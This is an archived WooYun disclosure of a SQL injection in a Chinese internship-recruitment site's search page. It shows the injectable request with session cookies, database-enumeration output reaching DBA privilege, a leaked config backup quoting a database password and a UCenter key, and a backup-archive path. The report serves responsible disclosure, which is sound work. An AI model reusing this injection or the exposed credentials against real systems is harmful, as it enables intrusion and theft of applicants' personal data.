乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-24: 细节已通知厂商并且等待厂商处理中 2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-09: 细节向核心白帽子及相关领域专家公开 2015-10-19: 细节向普通白帽子公开 2015-10-29: 细节向实习白帽子公开 2015-11-13: 细节向公众公开
RT
URL:http://**.**.**.**测试:
GET /shixibao/cp.php?residecity=&name=aaa&username=&searchsubmit=%B2%E9%D5%D2&ac=friend&op=search&type=base HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EEReferer: http://**.**.**.**/shixibao/cp.php?ac=friend&op=search&view=resideAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=9pn1vm0akovauie5a335c5tvb2; lvid=b19139a2392c542f441d7e58c619e264; nvid=1; s_pers=%20s_fid%3D45636F5C10EB727B-2D660E17E30AF73F%7C1505822950638%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Deshipeship-189-all%253D%252526pid%25253D%2525252Freg2%252526pidt%25253D1%252526oid%25253Djavascript%2525253A%2525253B%252526ot%25253DA%3B; DQMHStanduserId=20150000000032913522; userId=1%7C20150000000032913522; dqmhIpCityInfos=%E5%8C%97%E4%BA%AC%E5%B8%82+%E8%81%94%E9%80%9A; loginStatus=logined; __qc_wId=356; pgv_pvid=5871468180; trkHmPageName=%2Fbj%2F; trkHmCoords=0; trkHmCity=0; trkHmLinks=0; cityCode=bj; SHOPID_COOKIEID=10001; s_cc=true; s_fid=48FC7A85226ECCFE-18831160BEDE3A5D; s_sq=eshipeship-189-all%3D%2526pid%253D%25252Fdqmh%25252FuserCenter%25252FmyOrderInfoList.do%25253Fmethod%25253DmangeAddr%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252F**.**.**.**%25252Fdqmh%25252FssoLink.do%25253Fmethod%25253Dskip%252526platNo%25253D93505%252526toStUrl%25253Dhttp%25253A%25252F%25252F**.**.**.**%2526ot%253DA; trkHmClickCoords=1284%2C8; LSID=aSEUDBw0HFa8WvQGL-; uchome_view_blogid=205; jiathis_rdc=%7B%22http%3A//**.**.**.**/shixibao/space.php%3Fuid%3D52131%26do%3Dblog%26id%3D206%22%3A0%7C1442665279182%2C%22http%3A//**.**.**.**/shixibao/space.php%3Fuid%3D52114%26do%3Dblog%26id%3D205%22%3A%220%7C1442665846816%22%7D; jnfbygbookbid=1; jnfbyloginnum=2; jnfbylastlogintime=1442666836; uchome_seccode=744dI4LaOKteAVAbz6x7ThTGunfUfl3SGWhujNXCP8LL; uchome_auth=b589k0qHxDIqjn39rocSgwJnruaOoGoBmKJdjDWIfJuO40SCQCR3ymxPdtHYKPyw5w3i5lvXx0EgEWG30JINuKiCIQ; uchome_loginuser=testwooyun; uchome_jnfbymluserid=52131; uchome_synfriend=1; uchome_reurl=%252Fshixibao%252Fcp.php%253Fac%253Dzhiwei_result_detail%2526ignore%253D1%2526jobid%253D6656; uchome_checkpm=1; uchome_sendmail=1; CNZZDATA1252975852=2119416073-1442662706-null%7C1442662706
权限和用户:
current user is DBA: Truecurrent user: 'admin@%'
数据库(16个):
available databases [16]:[*] cdcol[*] cem_db[*] game[*] information_schema[*] mysql[*] performance_schema[*] phpmyadmin[*] shixibao[*] shixibao_uc[*] shixibao_uchome[*] shixibao_uchome_20140525[*] test[*] testmql[*] ultrax[*] webauth[*] zhiweibeifen
shixibao_uchome:
[182 tables]+----------------------------+| dajie || jobcollect || mm_attach_files || mm_audition_task || mm_audition_user || mm_city || mm_company_interest || mm_company_visitor || mm_compus_news || mm_compus_posdeli_view || mm_delivercont_view || mm_delivery || mm_delivery_attach || mm_department || mm_dept_location || mm_deptinfo || mm_dynamic || mm_employinfo || mm_employinfo_view || mm_enterprise_zhaopin || mm_follow || mm_grade_template || mm_grades_enter || mm_grades_user || mm_hgz_user || mm_home_card || mm_interview_notice || mm_jianzhi_delivery || mm_like || mm_lucky_log || mm_lucky_wall || mm_mail_template || mm_mailqueue || mm_member_view || mm_parttime_job || mm_personal_zhaopin || mm_post_attachment || mm_post_recommend || mm_postclass || mm_postclass_detail || mm_praise || mm_provinces || mm_questions || mm_questions_view || mm_replayments || mm_replayments_view || mm_report || mm_score || mm_score_eachsum || mm_score_item || mm_score_mark || mm_score_marker || mm_score_stat || mm_score_task || mm_score_template || mm_strategies || mm_students_star || mm_subscribe_job || mm_talent_pool || mm_task || mm_task_attach || mm_task_mapping || mm_taskcompany_map || mm_taskuser_map || mm_themes || mm_univs || mm_user_upload || mm_userbaseinfo || mm_usercode_map || mm_usereduinfo || mm_userinfo || mm_userinfo_zhiweiinfo_all || mm_userreg_channel || mm_userresumeinfo || mm_userskill_map || mm_useruniversmap || mm_userunivsmap_view || mm_video_course || mm_video_score || mm_video_wall || mm_whos_online || mm_work || mm_work_comment || mm_young_report || mm_young_report_map || mm_young_tribe || mm_younger_gd_temp || mm_youngmembers || mm_zhiwei_questions || mm_zhiwei_replayments || mm_zhiwei_send || mm_zhiwei_temp || mm_zhiweiapply_view || mm_zhiweiapply_view_1 || mm_zhiweiinfo || mm_ztask_classify || uchome_activity_notice || uchome_ad || uchome_adminsession || uchome_album || uchome_appcreditlog || uchome_blacklist || uchome_block || uchome_blog || uchome_blogfield || uchome_cache || uchome_class || uchome_click || uchome_clickuser || uchome_comment || uchome_config || uchome_coupon || uchome_creditlog || uchome_creditrule || uchome_cron || uchome_data || uchome_docomment || uchome_doing || uchome_event || uchome_eventclass || uchome_eventfield || uchome_eventinvite || uchome_eventpic || uchome_feed || uchome_friend || uchome_friendguide || uchome_friendlog || uchome_home_card || uchome_invite || uchome_job || uchome_log || uchome_magic || uchome_magicinlog || uchome_magicstore || uchome_magicuselog || uchome_mailcron || uchome_mailqueue || uchome_member || uchome_member_extend || uchome_member_third || uchome_mtag || uchome_mtaginvite || uchome_myapp || uchome_myinvite || uchome_notification || uchome_pic || uchome_picfield || uchome_poke || uchome_poll || uchome_pollfield || uchome_polloption || uchome_polluser || uchome_post || uchome_profield || uchome_profilefield || uchome_report || uchome_resume || uchome_session || uchome_share || uchome_show || uchome_space || uchome_spacefield || uchome_spaceinfo || uchome_spacelog || uchome_stat || uchome_statuser || uchome_tag || uchome_tagblog || uchome_tagspace || uchome_task || uchome_thread || uchome_topic || uchome_topicuser || uchome_userapp || uchome_userappfield || uchome_userevent || uchome_usergroup || uchome_userlog || uchome_usermagic || uchome_usertask || uchome_visitor || uchome_zan |+----------------------------+
shixibao_uchome -> mm_userinfo 35895条用户资料信息还有一些侧漏的东西:1.http://**.**.**.**/shixibao/config.php.bak
应用管理->查看本应用->复制里面对应的配置信息进行替换) define('UC_CONNECT', 'mysql'); // 连接 UCenter 的方式: mysql/NULL, 默认为空时为 fscoketopen(), mysql 是直接连接的数据库, 为了效率, 建议采用 mysql define('UC_DBHOST', '**.**.**.**'); // UCenter 数据库主机 define('UC_DBUSER', 'admin'); // UCenter 数据库用户名 define('UC_DBPW', 'ctbri4008118114'); // UCenter 数据库密码 define('UC_DBNAME', 'shixibao_uc'); // UCenter 数据库名称 define('UC_DBCHARSET', 'gbk'); // UCenter 数据库字符集 define('UC_DBTABLEPRE', '`shixibao_uc`.uc_'); // UCenter 数据库表前缀 define('UC_DBCONNECT', '0'); // UCenter 数据库持久连接 0=关闭, 1=打开 define('UC_KEY', 'abc123'); // 与 UCenter 的通信密钥, 要与 UCenter 保持一致 define('UC_API', 'http://**.**.**.**/shixibao/ucenter'); // UCenter 的 URL 地址, 在调用头像时依赖此常量 define('UC_CHARSET', 'gbk'); // UCenter 的字符集 define('UC_IP', '**.**.**.**'); // UCenter 的 IP, 当 UC_CONNECT 为非 mysql 方式时, 并且当前应用服务器解析域名有问题时, 请设置此值 define('UC_APPID', '4'); // 当前应用的 ID define('UC_PPP', 20);
2.备份:http://**.**.**.**/shixibao/data.rar
保护应聘者的信息
危害等级:高
漏洞Rank:11
确认时间:2015-09-29 10:06
CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置
暂无